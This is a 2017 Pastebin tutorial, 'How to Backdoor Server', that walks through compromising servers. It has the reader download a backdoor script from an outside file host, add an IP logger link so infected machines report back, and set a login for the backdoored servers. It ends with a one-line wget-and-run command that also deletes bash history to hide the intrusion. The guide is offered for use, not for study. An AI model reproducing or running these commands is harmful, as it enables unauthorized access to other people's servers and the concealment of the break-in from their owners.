Advertisement
TazThaGod

How to Backdoor Server (TUT) by: TazThaGod

Jun 10th, 2017
727
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
  1. ___ ______________________________ ___
  2. / _ \_/\ \__ ___/\__ ___/ _____/ / _ \_/\
  3. \/ \___/ | | | | / \ ___ \/ \___/
  4. | | | | \ \_\ \
  5. |____| |____| \______ /
  6. \/
  7. IG @TazThaGod
  8. Skype: Taz.Warrior
  9. #########################################################
  10.  
  11. ~ Requirments ~
  12.  
  13. - A Brain
  14. - The Backdoor
  15. - IP Logger
  16. - Site to upload files
  17.  
  18. #########################################################
  19.  
  20. ~ Step One ~
  21.  
  22. Download the backdoor from this site ----> https://a.safe.moe/qY8fu.sh
  23.  
  24. #########################################################
  25.  
  26. ~ Step Two ~
  27.  
  28. Open the Backdoor in Notepad ++ or Sublime Text Editor
  29.  
  30. #########################################################
  31.  
  32. ~ Step Three ~
  33.  
  34. Create a IP Logger ---> https://iplogger.org/
  35.  
  36. Make a Account
  37.  
  38. Make a Logger
  39.  
  40. Copy the google short link
  41.  
  42. #########################################################
  43.  
  44. ~ Step Four ~
  45.  
  46. Insert That link in the backdoor
  47.  
  48. "wget -q LINK HERE"
  49.  
  50. ex. "wget -q https://goo.gl/doR7kl"
  51.  
  52. After you insert that link, Go Down "rm -rf Backdoor.sh END OF LINK index.html"
  53.  
  54. Change "END OF LINK" to the last part of the google short link
  55.  
  56. ex. "rm -rf Backdoor.sh doR7kl index.html"
  57.  
  58. #########################################################
  59.  
  60. ~ Step Five ~
  61.  
  62. Create the Login you will use for the backdoored servers
  63.  
  64. user='USERNAME'
  65. pass='PASSWORD'
  66.  
  67. Fill in the blanks, Pretty self explanitory
  68.  
  69. #########################################################
  70.  
  71. ~ Step Six ~
  72.  
  73. Create the Command you will use to execute the backdoor and erase all history to show nothing is there or was there
  74.  
  75. Go to this fileuploader site ---> https://safe.moe/ or https://cocaine.ninja/ both will work fine
  76.  
  77. Once it is uploaded you are almost done, Now we are gonna create the command line
  78.  
  79. #########################################################
  80.  
  81. ~ Step Seven ~
  82.  
  83. Creating the Command Line
  84.  
  85. First you are gonna start off with wgeting the file onto the server
  86.  
  87. ex. wget https://a.safe.moe/qY8fu.sh
  88.  
  89. Then we got to execute the backdoor, Delete the file, Erase History.
  90.  
  91. So lets get started ...
  92.  
  93. wget https://a.safe.moe/qY8fu.sh ; mv qY8fu.sh Backdoor.sh ; sh Backdoor ; rm -rf ~/.bash_history ; history -c
  94.  
  95. this is your command you will type in the server to backdoor it, if it worked correctly then the ip of the server will be logged in the ip logger.
  96.  
  97. Have Fun Backdooring Servers
  98.  
  99. #########################################################
  100. ___ ______________________________ ___
  101. / _ \_/\ \__ ___/\__ ___/ _____/ / _ \_/\
  102. \/ \___/ | | | | / \ ___ \/ \___/
  103. | | | | \ \_\ \
  104. |____| |____| \______ /
  105. \/
  106. #########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement